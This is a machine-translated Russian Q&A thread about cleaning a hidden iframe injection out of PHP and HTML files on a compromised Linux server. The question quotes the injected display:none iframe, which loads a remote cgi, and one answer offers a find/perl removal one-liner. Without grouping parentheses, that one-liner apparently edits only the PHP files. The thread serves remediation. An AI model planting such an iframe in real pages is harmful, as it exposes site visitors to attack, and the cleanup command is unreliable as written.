Вирус iframe, необходимо удалить из всех файлов phps и html на сервере linux

Question

Вирус iframe, необходимо удалить из всех файлов phps и html на сервере linux

Следующая строка была добавлена почти ко всем php-файлам и некоторым html-файлам на моем linux-сервере. Какова команда, чтобы удалить это, не повредив ничего больше?

iframe qoluu = 'V5pEXGSm' src = ' http://getrelax4you.com/in.cgi?7 ' width = '98 'height =' 407 'style =' display: none '>

Начало и конец вышеуказанной строки имеет< >

и будет ли команда искать все папки?

1

linux iframe command virus

Источник

user374567 23 июн '10 в 19:09

2 ответа

Другие вопросы по тегам linux iframe command virus

user13724 24 июн '10 в 05:52 2010-06-24 05:52 · Answer 1 · 2010-06-24 05:52

Ваш сервер был взломан, просто восстановите файлы сайта на чистом сервере из репозитория исходного кода.

Исправление любых пользовательских данных может быть более сложным, вы больше не можете доверять содержимому вашей базы данных, поэтому вы должны быть очень осторожны. Повезет в следующий раз.

user2583 23 июн '10 в 19:21 2010-06-23 19:21 · Answer 2 · 2010-06-23 19:21

Упрощенное решение, при условии, что весь вирусный код находится в одной строке:

find /www/directory -name '*.html' -o -name '*.php' -exec perl -i -ne 'print unless /getrelax4you\.com/' '{}' \;

Краткое объяснение: посетите все файлы в каталоге / www / с расширением html или php. Используйте perl для редактирования каждого файла на месте, дословно скопировав все строки для вывода, если они не содержат строку "getrelax4you.com"; которые удалены.

Пусть покупатель будет бдителен! Сделайте резервную копию, прежде чем пытаться это; Я мог пропустить некоторые мелкие детали.